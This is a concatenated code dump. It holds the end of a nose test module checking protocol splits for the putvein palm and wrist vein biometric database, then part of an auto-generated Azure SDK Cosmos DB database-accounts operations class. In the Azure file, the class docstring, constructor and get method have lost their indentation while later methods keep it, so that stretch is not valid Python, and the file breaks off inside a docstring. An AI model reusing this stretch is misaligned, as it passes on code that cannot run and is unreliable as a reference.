    nose.tools.eq_(len(objs), 300)  # number of palm eval images in the protocol

    objs = db.objects(protocol, kinds='wrist', groups='train')
    nose.tools.eq_(len(objs), 300)  # number of wrist train images in the protocol
    objs = db.objects(protocol, kinds='wrist', groups='dev')
    nose.tools.eq_(len(objs), 300)  # number of wrist dev images in the protocol
    objs = db.objects(protocol, kinds='wrist', groups='eval')
    nose.tools.eq_(len(objs), 300)  # number of wrist eval images in the protocol

    objs = db.objects(protocol, kinds='palm', groups='dev', purposes='enroll')
    nose.tools.eq_(len(objs), 100)  # number of palm dev enroll images in the protocol
    objs = db.objects(protocol, kinds='palm', groups='dev', purposes='probe')
    nose.tools.eq_(len(objs), 200)  # number of palm dev probe images in the protocol
    objs = db.objects(protocol, kinds='palm', groups='eval', purposes='enroll')
    nose.tools.eq_(len(objs), 100)  # number of palm eval enroll images in the protocol
    objs = db.objects(protocol, kinds='palm', groups='eval', purposes='probe')
    nose.tools.eq_(len(objs), 200)  # number of palm eval probe images in the protocol

    objs = db.objects(protocol, kinds='wrist', groups='dev', purposes='enroll')
    nose.tools.eq_(len(objs), 100)  # number of wrist dev enroll images in the protocol
    objs = db.objects(protocol, kinds='wrist', groups='dev', purposes='probe')
    nose.tools.eq_(len(objs), 200)  # number of wrist dev probe images in the protocol
    objs = db.objects(protocol, kinds='wrist', groups='eval', purposes='enroll')
    nose.tools.eq_(len(objs), 100)  # number of wrist eval enroll images in the protocol
    objs = db.objects(protocol, kinds='wrist', groups='eval', purposes='probe')
    nose.tools.eq_(len(objs), 200)  # number of wrist eval probe images in the protocol

    objs = db.objects(protocol, kinds='wrist', groups='eval', purposes='probe', model_ids=["26"])
    objs_probe = db.objects(protocol, kinds='wrist', groups='eval', purposes='probe')
    # When querying for probes with an exact MODEL ID, all probe files should
    # be returned:
    nose.tools.eq_(len(objs), len(objs_probe))

    if protocol.startswith('L'):
        nose.tools.eq_(objs[0].make_path(), 'Wrist/o_026/Left/Series_2/W_o026_L_S2_Nr1.bmp')
    else:
        nose.tools.eq_(objs[0].make_path(), 'Wrist/o_026/Right/Series_2/W_o026_R_S2_Nr1.bmp')
def _query_combined_protocol_tests(protocol):
    db = Database()

    objs = db.objects(protocol)
    nose.tools.eq_(len(objs), 7200)  # number of images in the protocol

    objs = db.objects(protocol, kinds='palm')
    nose.tools.eq_(len(objs), 3600)  # number of palm images in the protocol
    objs = db.objects(protocol, kinds='wrist')
    nose.tools.eq_(len(objs), 3600)  # number of wrist images in the protocol

    objs = db.objects(protocol, groups='train')
    nose.tools.eq_(len(objs), 1200)  # number of train images in the protocol
    objs = db.objects(protocol, groups='dev')
    nose.tools.eq_(len(objs), 1200)  # number of dev images in the protocol
    objs = db.objects(protocol, groups='eval')
    nose.tools.eq_(len(objs), 1200)  # number of eval images in the protocol

    objs = db.objects(protocol, kinds='palm', groups='train')
    nose.tools.eq_(len(objs), 600)  # number of palm train images in the protocol
    objs = db.objects(protocol, kinds='palm', groups='dev')
    nose.tools.eq_(len(objs), 600)  # number of palm dev images in the protocol
    objs = db.objects(protocol, kinds='palm', groups='eval')
    nose.tools.eq_(len(objs), 600)  # number of palm eval images in the protocol

    objs = db.objects(protocol, kinds='wrist', groups='train')
    nose.tools.eq_(len(objs), 600)  # number of wrist train images in the protocol
    objs = db.objects(protocol, kinds='wrist', groups='dev')
    nose.tools.eq_(len(objs), 600)  # number of wrist dev images in the protocol
    objs = db.objects(protocol, kinds='wrist', groups='eval')
    nose.tools.eq_(len(objs), 600)  # number of wrist eval images in the protocol

    objs = db.objects(protocol, kinds='palm', groups='dev', purposes='enroll')
    nose.tools.eq_(len(objs), 200)  # number of palm dev enroll images in the protocol
    objs = db.objects(protocol, kinds='palm', groups='dev', purposes='probe')
    nose.tools.eq_(len(objs), 400)  # number of palm dev probe images in the protocol
    objs = db.objects(protocol, kinds='palm', groups='eval', purposes='enroll')
    nose.tools.eq_(len(objs), 200)  # number of palm eval enroll images in the protocol
    objs = db.objects(protocol, kinds='palm', groups='eval', purposes='probe')
    nose.tools.eq_(len(objs), 400)  # number of palm eval probe images in the protocol

    objs = db.objects(protocol, kinds='wrist', groups='dev', purposes='enroll')
    nose.tools.eq_(len(objs), 200)  # number of wrist dev enroll images in the protocol
    objs = db.objects(protocol, kinds='wrist', groups='dev', purposes='probe')
    nose.tools.eq_(len(objs), 400)  # number of wrist dev probe images in the protocol
    objs = db.objects(protocol, kinds='wrist', groups='eval', purposes='enroll')
    nose.tools.eq_(len(objs), 200)  # number of wrist eval enroll images in the protocol
    objs = db.objects(protocol, kinds='wrist', groups='eval', purposes='probe')
    nose.tools.eq_(len(objs), 400)  # number of wrist eval probe images in the protocol
def test_query_L_4_protocol():
    protocol = 'L_4'
    _query_simple_protocol_tests(protocol)

    db = Database()

    objs = db.objects(protocol=protocol, kinds='wrist', groups='dev', purposes='enroll', model_ids=["1"])
    nose.tools.eq_(len(objs), 4)
    for obj in objs:
        nose.tools.eq_(obj.get_client_id(), 1)
        nose.tools.eq_(obj.is_mirrored(), False)

    objs = db.objects(protocol=protocol, kinds='wrist', groups='dev', purposes='probe', model_ids=["1"])
    nose.tools.eq_(len(objs), 25*(4*2))

    objs = db.objects(protocol=protocol, kinds='wrist', groups='eval', purposes='enroll', model_ids=["26"])
    nose.tools.eq_(len(objs), 4)
    for obj in objs:
        nose.tools.eq_(obj.get_client_id(), 26)
        nose.tools.eq_(obj.is_mirrored(), False)

    objs = db.objects(protocol=protocol, kinds='wrist', groups='eval', purposes='probe', model_ids=["26"])
    nose.tools.eq_(len(objs), 25*(4*2))


def test_query_R_4_protocol():
    protocol = 'R_4'
    _query_simple_protocol_tests(protocol)

    db = Database()

    objs = db.objects(protocol=protocol, kinds='wrist', groups='dev', purposes='enroll', model_ids=["1"])
    nose.tools.eq_(len(objs), 4)
    for obj in objs:
        nose.tools.eq_(obj.get_client_id(), 1)
        nose.tools.eq_(obj.is_mirrored(), False)

    objs = db.objects(protocol=protocol, kinds='wrist', groups='dev', purposes='probe', model_ids=["1"])
    nose.tools.eq_(len(objs), 25*(4*2))

    objs = db.objects(protocol=protocol, kinds='wrist', groups='eval', purposes='enroll', model_ids=["26"])
    nose.tools.eq_(len(objs), 4)
    for obj in objs:
        nose.tools.eq_(obj.get_client_id(), 26)
        nose.tools.eq_(obj.is_mirrored(), False)

    objs = db.objects(protocol=protocol, kinds='wrist', groups='eval', purposes='probe', model_ids=["26"])
    nose.tools.eq_(len(objs), 25*(4*2))


def test_query_LR_4_protocol():
    protocol = 'LR_4'
    _query_combined_protocol_tests(protocol)

    db = Database()

    objs = db.objects(protocol=protocol, kinds='wrist', groups='dev', purposes='enroll', model_ids=["26"])
    nose.tools.eq_(len(objs), 4)
    for obj in objs:
        nose.tools.eq_(obj.get_client_id(), 26)
        nose.tools.eq_(obj.is_mirrored(), False)

    objs = db.objects(protocol=protocol, kinds='wrist', groups='dev', purposes='probe', model_ids=["26"])
    nose.tools.eq_(len(objs), 25*(4*2)*2)

    objs = db.objects(protocol=protocol, kinds='wrist', groups='eval', purposes='enroll', model_ids=["61"])
    nose.tools.eq_(len(objs), 4)
    for obj in objs:
        nose.tools.eq_(obj.get_client_id(), 61)
        nose.tools.eq_(obj.is_mirrored(), True)

    objs = db.objects(protocol=protocol, kinds='wrist', groups='eval', purposes='probe', model_ids=["61"])
    nose.tools.eq_(len(objs), 25*(4*2)*2)


def test_query_RL_4_protocol():
    protocol = 'RL_4'
    _query_combined_protocol_tests(protocol)

    db = Database()

    objs = db.objects(protocol=protocol, kinds='wrist', groups='dev', purposes='enroll', model_ids=["26"])
    nose.tools.eq_(len(objs), 4)
    for obj in objs:
        nose.tools.eq_(obj.get_client_id(), 26)
        nose.tools.eq_(obj.is_mirrored(), False)

    objs = db.objects(protocol=protocol, kinds='wrist', groups='dev', purposes='probe', model_ids=["26"])
    nose.tools.eq_(len(objs), 25*(4*2)*2)

    objs = db.objects(protocol=protocol, kinds='wrist', groups='eval', purposes='enroll', model_ids=["61"])
    nose.tools.eq_(len(objs), 4)
    for obj in objs:
        nose.tools.eq_(obj.get_client_id(), 61)
        nose.tools.eq_(obj.is_mirrored(), True)

    objs = db.objects(protocol=protocol, kinds='wrist', groups='eval', purposes='probe', model_ids=["61"])
    nose.tools.eq_(len(objs), 25*(4*2)*2)

###############################################################################
def test_query_L_1_protocol():
    protocol = 'L_1'
    _query_simple_protocol_tests(protocol)

    db = Database()

    objs = db.objects(protocol=protocol, kinds='wrist', groups='dev', purposes='enroll', model_ids=["1_3"])
    nose.tools.eq_(len(objs), 1)
    for obj in objs:
        nose.tools.eq_(obj.get_client_id(), 1)
        nose.tools.eq_(obj.is_mirrored(), False)

    objs = db.objects(protocol=protocol, kinds='wrist', groups='dev', purposes='probe', model_ids=["1_3"])
    nose.tools.eq_(len(objs), 25*(4*2))

    objs = db.objects(protocol=protocol, kinds='wrist', groups='eval', purposes='enroll', model_ids=["26_2"])
    nose.tools.eq_(len(objs), 1)
    for obj in objs:
        nose.tools.eq_(obj.get_client_id(), 26)
        nose.tools.eq_(obj.is_mirrored(), False)

    objs = db.objects(protocol=protocol, kinds='wrist', groups='eval', purposes='probe', model_ids=["26_3"])
    nose.tools.eq_(len(objs), 25*(4*2))


def test_query_R_1_protocol():
    protocol = 'R_1'
    _query_simple_protocol_tests(protocol)

    db = Database()

    objs = db.objects(protocol=protocol, kinds='wrist', groups='dev', purposes='enroll', model_ids=["1_3"])
    nose.tools.eq_(len(objs), 1)
    for obj in objs:
        nose.tools.eq_(obj.get_client_id(), 1)
        nose.tools.eq_(obj.is_mirrored(), False)

    objs = db.objects(protocol=protocol, kinds='wrist', groups='dev', purposes='probe', model_ids=["1_3"])
    nose.tools.eq_(len(objs), 25*(4*2))

    objs = db.objects(protocol=protocol, kinds='wrist', groups='eval', purposes='enroll', model_ids=["26_2"])
    nose.tools.eq_(len(objs), 1)
    for obj in objs:
        nose.tools.eq_(obj.get_client_id(), 26)
        nose.tools.eq_(obj.is_mirrored(), False)

    objs = db.objects(protocol=protocol, kinds='wrist', groups='eval', purposes='probe', model_ids=["26_3"])
    nose.tools.eq_(len(objs), 25*(4*2))


def test_query_LR_1_protocol():
    protocol = 'LR_1'
    _query_combined_protocol_tests(protocol)

    db = Database()

    objs = db.objects(protocol=protocol, kinds='wrist', groups='dev', purposes='enroll', model_ids=["26_4"])
    nose.tools.eq_(len(objs), 1)
    for obj in objs:
        nose.tools.eq_(obj.get_client_id(), 26)
        nose.tools.eq_(obj.is_mirrored(), False)

    objs = db.objects(protocol=protocol, kinds='wrist', groups='dev', purposes='probe', model_ids=["26_1"])
    nose.tools.eq_(len(objs), 25*(4*2)*2)

    objs = db.objects(protocol=protocol, kinds='wrist', groups='eval', purposes='enroll', model_ids=["61_1"])
    nose.tools.eq_(len(objs), 1)
    for obj in objs:
        nose.tools.eq_(obj.get_client_id(), 61)
        nose.tools.eq_(obj.is_mirrored(), True)

    objs = db.objects(protocol=protocol, kinds='wrist', groups='eval', purposes='probe', model_ids=["61_2"])
    nose.tools.eq_(len(objs), 25*(4*2)*2)


def test_query_RL_1_protocol():
    protocol = 'RL_1'
    _query_combined_protocol_tests(protocol)

    db = Database()

    objs = db.objects(protocol=protocol, kinds='wrist', groups='dev', purposes='enroll', model_ids=["26_2"])
    nose.tools.eq_(len(objs), 1)
    for obj in objs:
        nose.tools.eq_(obj.get_client_id(), 26)
        nose.tools.eq_(obj.is_mirrored(), False)

    objs = db.objects(protocol=protocol, kinds='wrist', groups='dev', purposes='probe', model_ids=["26_1"])
    nose.tools.eq_(len(objs), 25*(4*2)*2)

    objs = db.objects(protocol=protocol, kinds='wrist', groups='eval', purposes='enroll', model_ids=["61_4"])
    nose.tools.eq_(len(objs), 1)
    for obj in objs:
        nose.tools.eq_(obj.get_client_id(), 61)
        nose.tools.eq_(obj.is_mirrored(), True)

    objs = db.objects(protocol=protocol, kinds='wrist', groups='eval', purposes='probe', model_ids=["61_4"])
    nose.tools.eq_(len(objs), 25*(4*2)*2)
def test_query_R_BEAT_1_protocol():
    db = Database()

    # dev:
    objs = db.objects(protocol="R_BEAT_1", purposes="enroll", groups="dev", kinds="wrist")
    nose.tools.eq_(len(objs), 2*4)
    objs = db.objects(protocol="R_BEAT_1", purposes="probe", groups="dev", kinds="wrist")
    nose.tools.eq_(len(objs), 2*2*4)
    objs = db.objects(protocol="R_BEAT_1", purposes=["enroll"], groups="dev", kinds="wrist", model_ids=["1_1"])
    nose.tools.eq_(len(objs), 1)
    objs = db.objects(protocol="R_BEAT_1", purposes="enroll", groups="dev", kinds="wrist", model_ids=["1_1"])
    nose.tools.eq_(len(objs), 1)
    objs = db.objects(protocol="R_BEAT_1", purposes=["probe"], groups="dev", kinds="wrist", model_ids=["1_1"])
    nose.tools.eq_(len(objs), 16)
    objs = db.objects(protocol="R_BEAT_1", purposes="probe", groups="dev", kinds="wrist", model_ids=["1_1"])
    nose.tools.eq_(len(objs), 16)
    objs = db.model_ids(protocol="R_BEAT_1", groups="dev", kinds="palm")
    nose.tools.eq_(len(objs), 8)

    # eval:
    objs = db.objects(protocol="R_BEAT_1", purposes="enroll", groups="eval", kinds="wrist")
    nose.tools.eq_(len(objs), 2*4)
    objs = db.objects(protocol="R_BEAT_1", purposes="probe", groups="eval", kinds="wrist")
    nose.tools.eq_(len(objs), 2*2*4)
    objs = db.objects(protocol="R_BEAT_1", purposes=["enroll"], groups="eval", kinds="wrist", model_ids=["26_4"])
    nose.tools.eq_(len(objs), 1)
    objs = db.objects(protocol="R_BEAT_1", purposes="enroll", groups="eval", kinds="wrist", model_ids=["26_4"])
    nose.tools.eq_(len(objs), 1)
    objs = db.objects(protocol="R_BEAT_1", purposes=["probe"], groups="eval", kinds="wrist", model_ids=["26_4"])
    nose.tools.eq_(len(objs), 16)
    objs = db.objects(protocol="R_BEAT_1", purposes="probe", groups="eval", kinds="wrist", model_ids=["26_4"])
    nose.tools.eq_(len(objs), 16)
    objs = db.model_ids(protocol="R_BEAT_1", groups="eval", kinds="palm")
    nose.tools.eq_(len(objs), 8)

    # test the same on PALMS:
    # dev:
    objs = db.objects(protocol="R_BEAT_1", purposes="enroll", groups="dev", kinds="palm")
    nose.tools.eq_(len(objs), 2*4)
    objs = db.objects(protocol="R_BEAT_1", purposes="probe", groups="dev", kinds="palm")
    nose.tools.eq_(len(objs), 2*2*4)
    objs = db.objects(protocol="R_BEAT_1", purposes=["enroll"], groups="dev", kinds="palm", model_ids=["1_1"])
    nose.tools.eq_(len(objs), 1)
    objs = db.objects(protocol="R_BEAT_1", purposes="enroll", groups="dev", kinds="palm", model_ids=["1_1"])
    nose.tools.eq_(len(objs), 1)
    objs = db.objects(protocol="R_BEAT_1", purposes=["probe"], groups="dev", kinds="palm", model_ids=["1_1"])
    nose.tools.eq_(len(objs), 16)
    objs = db.objects(protocol="R_BEAT_1", purposes="probe", groups="dev", kinds="palm", model_ids=["1_1"])
    nose.tools.eq_(len(objs), 16)
    objs = db.model_ids(protocol="R_BEAT_1", groups="dev", kinds="palm")
    nose.tools.eq_(len(objs), 8)

    # eval:
    objs = db.objects(protocol="R_BEAT_1", purposes="enroll", groups="eval", kinds="palm")
    nose.tools.eq_(len(objs), 2*4)
    objs = db.objects(protocol="R_BEAT_1", purposes="probe", groups="eval", kinds="palm")
    nose.tools.eq_(len(objs), 2*2*4)
    objs = db.objects(protocol="R_BEAT_1", purposes=["enroll"], groups="eval", kinds="palm", model_ids=["26_4"])
    nose.tools.eq_(len(objs), 1)
    objs = db.objects(protocol="R_BEAT_1", purposes="enroll", groups="eval", kinds="palm", model_ids=["26_4"])
    nose.tools.eq_(len(objs), 1)
    objs = db.objects(protocol="R_BEAT_1", purposes=["probe"], groups="eval", kinds="palm", model_ids=["26_4"])
    nose.tools.eq_(len(objs), 16)
    objs = db.objects(protocol="R_BEAT_1", purposes="probe", groups="eval", kinds="palm", model_ids=["26_4"])
    nose.tools.eq_(len(objs), 16)
    objs = db.model_ids(protocol="R_BEAT_1", groups="eval", kinds="palm")
    nose.tools.eq_(len(objs), 8)


def test_query_R_BEAT_4_protocol():
    db = Database()

    # dev:
    objs = db.objects(protocol="R_BEAT_4", purposes="enroll", groups="dev", kinds="wrist")
    nose.tools.eq_(len(objs), 2*4)
    objs = db.objects(protocol="R_BEAT_4", purposes="probe", groups="dev", kinds="wrist")
    nose.tools.eq_(len(objs), 2*2*4)
    objs = db.objects(protocol="R_BEAT_4", purposes=["enroll"], groups="dev", kinds="wrist", model_ids=["1"])
    nose.tools.eq_(len(objs), 4)
    objs = db.objects(protocol="R_BEAT_4", purposes="enroll", groups="dev", kinds="wrist", model_ids=["1"])
    nose.tools.eq_(len(objs), 4)
    objs = db.objects(protocol="R_BEAT_4", purposes=["probe"], groups="dev", kinds="wrist", model_ids=["1"])
    nose.tools.eq_(len(objs), 16)
    objs = db.objects(protocol="R_BEAT_4", purposes="probe", groups="dev", kinds="wrist", model_ids=["1"])
    nose.tools.eq_(len(objs), 16)
    objs = db.model_ids(protocol="R_BEAT_4", groups="dev", kinds="palm")
    # note: list.sort() returns None, so the original eq_(objs.sort(), ...)
    # could never fail; compare the sorted lists instead:
    nose.tools.eq_(sorted(objs), ["1", "2"])

    # eval:
    objs = db.objects(protocol="R_BEAT_4", purposes="enroll", groups="eval", kinds="wrist")
    nose.tools.eq_(len(objs), 2*4)
    objs = db.objects(protocol="R_BEAT_4", purposes="probe", groups="eval", kinds="wrist")
    nose.tools.eq_(len(objs), 2*2*4)
    objs = db.objects(protocol="R_BEAT_4", purposes=["enroll"], groups="eval", kinds="wrist", model_ids=["26"])
    nose.tools.eq_(len(objs), 4)
    objs = db.objects(protocol="R_BEAT_4", purposes="enroll", groups="eval", kinds="wrist", model_ids=["26"])
    nose.tools.eq_(len(objs), 4)
    objs = db.objects(protocol="R_BEAT_4", purposes=["probe"], groups="eval", kinds="wrist", model_ids=["26"])
    nose.tools.eq_(len(objs), 16)
    objs = db.objects(protocol="R_BEAT_4", purposes="probe", groups="eval", kinds="wrist", model_ids=["26"])
    nose.tools.eq_(len(objs), 16)
    objs = db.model_ids(protocol="R_BEAT_4", groups="eval", kinds="palm")
    nose.tools.eq_(sorted(objs), ["26", "27"])

    # test the same on PALMS:
    # dev:
    objs = db.objects(protocol="R_BEAT_4", purposes="enroll", groups="dev", kinds="palm")
    nose.tools.eq_(len(objs), 2*4)
    objs = db.objects(protocol="R_BEAT_4", purposes="probe", groups="dev", kinds="palm")
    nose.tools.eq_(len(objs), 2*2*4)
    objs = db.objects(protocol="R_BEAT_4", purposes=["enroll"], groups="dev", kinds="palm", model_ids=["1"])
    nose.tools.eq_(len(objs), 4)
    objs = db.objects(protocol="R_BEAT_4", purposes="enroll", groups="dev", kinds="palm", model_ids=["1"])
    nose.tools.eq_(len(objs), 4)
    objs = db.objects(protocol="R_BEAT_4", purposes=["probe"], groups="dev", kinds="palm", model_ids=["1"])
    nose.tools.eq_(len(objs), 16)
    objs = db.objects(protocol="R_BEAT_4", purposes="probe", groups="dev", kinds="palm", model_ids=["1"])
    nose.tools.eq_(len(objs), 16)
    objs = db.model_ids(protocol="R_BEAT_4", groups="dev", kinds="palm")
    nose.tools.eq_(sorted(objs), ["1", "2"])

    # eval:
    objs = db.objects(protocol="R_BEAT_4", purposes="enroll", groups="eval", kinds="palm")
    nose.tools.eq_(len(objs), 2*4)
    objs = db.objects(protocol="R_BEAT_4", purposes="probe", groups="eval", kinds="palm")
    nose.tools.eq_(len(objs), 2*2*4)
    objs = db.objects(protocol="R_BEAT_4", purposes=["enroll"], groups="eval", kinds="palm", model_ids=["26"])
    nose.tools.eq_(len(objs), 4)
    objs = db.objects(protocol="R_BEAT_4", purposes="enroll", groups="eval", kinds="palm", model_ids=["26"])
    nose.tools.eq_(len(objs), 4)
    objs = db.objects(protocol="R_BEAT_4", purposes=["probe"], groups="eval", kinds="palm", model_ids=["26"])
    nose.tools.eq_(len(objs), 16)
    objs = db.objects(protocol="R_BEAT_4", purposes="probe", groups="eval", kinds="palm", model_ids=["26"])
    nose.tools.eq_(len(objs), 16)
    objs = db.model_ids(protocol="R_BEAT_4", groups="eval", kinds="palm")
    nose.tools.eq_(sorted(objs), ["26", "27"])

def test_dumplist():
    from bob.db.base.script.dbmanage import main
    nose.tools.eq_(main('putvein dumplist --protocol=L_4 --self-test'.split()), 0)

"""
import bob.db.putvein
from bob.db.putvein import Database
db = bob.db.putvein.Database()
import nose.tools
"""
# --- sdk/cosmos/azure-mgmt-cosmosdb/azure/mgmt/cosmosdb/operations/_database_accounts_operations.py
#     (repo: kushan2018/azure-sdk-for-python, license: MIT) ---

# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrest.polling import LROPoller, NoPolling
from msrestazure.polling.arm_polling import ARMPolling
from .. import models
class DatabaseAccountsOperations(object):
"""DatabaseAccountsOperations operations.
You should not instantiate directly this class, but create a Client instance that will create it for you and attach it as attribute.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: Version of the API to be used with the client request. The current version is 2015-04-08. Constant value: "2015-04-08".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2015-04-08"
self.config = config
def get(
self, resource_group_name, account_name, custom_headers=None, raw=False, **operation_config):
"""Retrieves the properties of an existing Azure Cosmos DB database
account.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: DatabaseAccount or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.cosmosdb.models.DatabaseAccount or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('DatabaseAccount', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}'}

    def _patch_initial(
            self, resource_group_name, account_name, tags=None, capabilities=None, custom_headers=None, raw=False, **operation_config):
        update_parameters = models.DatabaseAccountPatchParameters(tags=tags, capabilities=capabilities)

        # Construct URL
        url = self.patch.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct body
        body_content = self._serialize.body(update_parameters, 'DatabaseAccountPatchParameters')

        # Construct and send request
        request = self._client.patch(url, query_parameters, header_parameters, body_content)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('DatabaseAccount', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized

    def patch(
            self, resource_group_name, account_name, tags=None, capabilities=None, custom_headers=None, raw=False, polling=True, **operation_config):
        """Patches the properties of an existing Azure Cosmos DB database
        account.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param tags:
        :type tags: dict[str, str]
        :param capabilities: List of Cosmos DB capabilities for the account
        :type capabilities: list[~azure.mgmt.cosmosdb.models.Capability]
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: The poller return type is ClientRawResponse, the
         direct response alongside the deserialized response
        :param polling: True for ARMPolling, False for no polling, or a
         polling object for personal polling strategy
        :return: An instance of LROPoller that returns DatabaseAccount or
         ClientRawResponse<DatabaseAccount> if raw==True
        :rtype:
         ~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cosmosdb.models.DatabaseAccount]
         or
         ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.DatabaseAccount]]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        raw_result = self._patch_initial(
            resource_group_name=resource_group_name,
            account_name=account_name,
            tags=tags,
            capabilities=capabilities,
            custom_headers=custom_headers,
            raw=True,
            **operation_config
        )

        def get_long_running_output(response):
            deserialized = self._deserialize('DatabaseAccount', response)

            if raw:
                client_raw_response = ClientRawResponse(deserialized, response)
                return client_raw_response

            return deserialized

        lro_delay = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    patch.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}'}
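    # Usage sketch (hypothetical names: assumes `client` is an authenticated
    # CosmosDB management client that exposes this operations group as
    # `client.database_accounts`). `patch` kicks off a long-running PATCH and
    # returns a poller:
    #
    #     poller = client.database_accounts.patch(
    #         'my-resource-group', 'my-account', tags={'env': 'dev'})
    #     account = poller.result()  # blocks until the LRO completes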

    def _create_or_update_initial(
            self, resource_group_name, account_name, create_update_parameters, custom_headers=None, raw=False, **operation_config):
        # Construct URL
        url = self.create_or_update.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct body
        body_content = self._serialize.body(create_update_parameters, 'DatabaseAccountCreateUpdateParameters')

        # Construct and send request
        request = self._client.put(url, query_parameters, header_parameters, body_content)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('DatabaseAccount', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized

    def create_or_update(
            self, resource_group_name, account_name, create_update_parameters, custom_headers=None, raw=False, polling=True, **operation_config):
        """Creates or updates an Azure Cosmos DB database account.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param create_update_parameters: The parameters to provide for the
         current database account.
        :type create_update_parameters:
         ~azure.mgmt.cosmosdb.models.DatabaseAccountCreateUpdateParameters
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: The poller return type is ClientRawResponse, the
         direct response alongside the deserialized response
